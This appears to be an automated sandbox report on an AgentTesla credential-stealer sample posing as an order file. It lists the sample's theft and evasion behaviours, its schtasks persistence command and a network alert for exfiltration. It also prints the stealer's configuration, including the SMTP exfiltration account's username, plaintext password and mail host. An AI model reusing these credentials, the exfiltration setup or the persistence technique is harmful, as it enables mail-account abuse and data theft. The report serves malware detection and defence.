Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe

Overview

General Information

Sample Name:new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
Analysis ID:532730
MD5:66cbe976594f666d5440264a4084b21f
SHA1:944c8819e41ad59333527141a7fd5180253969e1
SHA256:460eb4667362671be2be1e94afe56e73331c3a3cd58b028e49ec135fec8888a9
Tags:agentteslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Creates processes with suspicious names
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "marketing@kyowasecurity.com.sg", "Password": "avKw1$991", "Host": "mail.kyowasecurity.com.sg"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.282084634.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000000.282084634.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000005.00000000.283151659.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000000.283151659.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Click to see the 14 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.6.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.6.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.10.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.10.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.3922928.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 16 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicius Add Task From User AppData TempShow sources
                      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aUkURZiJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8923.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aUkURZiJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8923.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe" , ParentImage: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, ParentProcessId: 4252, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aUkURZiJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8923.tmp, ProcessId: 2964

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.4.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "marketing@kyowasecurity.com.sg", "Password": "avKw1$991", "Host": "mail.kyowasecurity.com.sg"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeReversingLabs: Detection: 41%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\aUkURZiJ.exeReversingLabs: Detection: 41%
                      Machine Learning detection for sampleShow sources
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\aUkURZiJ.exeJoe Sandbox ML: detected
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49831 -> 113.197.35.43:587
                      Source: Joe Sandbox ViewASN Name: USONYX-AS-APUSONYXPTELTDSG USONYX-AS-APUSONYXPTELTDSG
                      Source: global trafficTCP traffic: 192.168.2.5:49831 -> 113.197.35.43:587
                      Source: global trafficTCP traffic: 192.168.2.5:49831 -> 113.197.35.43:587
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmpString found in binary or memory: http://KpGsSw.com
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.524762835.0000000003112000.00000004.00000001.sdmpString found in binary or memory: http://mail.kyowasecurity.com.sg
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248903417.000000000569E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248877687.00000000056A1000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248865129.000000000569E000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292765423.0000000005660000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.285795268.0000000005660000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255044284.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.261125302.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253788835.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253886398.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252653993.0000000005699000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252695500.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252577474.000000000569C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252494210.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252547005.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252614032.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252799955.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252653993.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252756029.0000000005699000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlrpQj
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253657790.0000000005699000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html8
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252494210.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252547005.0000000005699000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/j
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254671506.0000000005699000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers6
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.261091046.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.261061221.0000000005699000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersW
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254877068.0000000005699000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerss
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com=
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.256055028.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comI.TTFks
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comVsF
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomF
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.256209853.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.256055028.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdrs
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed3sm
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsiva
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292765423.0000000005660000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.285795268.0000000005660000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comttv
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comtuta
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252725051.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252931728.000000000566F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comzana
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248100348.000000000569A000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248045051.0000000005699000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248332429.0000000005699000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257088272.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257018883.0000000005699000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257184730.000000000566E000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/3sm
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.258256920.000000000567A000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257256254.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257951856.000000000567A000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257160579.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257050058.000000000569D000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257213807.000000000567A000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257382975.000000000567A000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257294565.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257018883.0000000005699000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
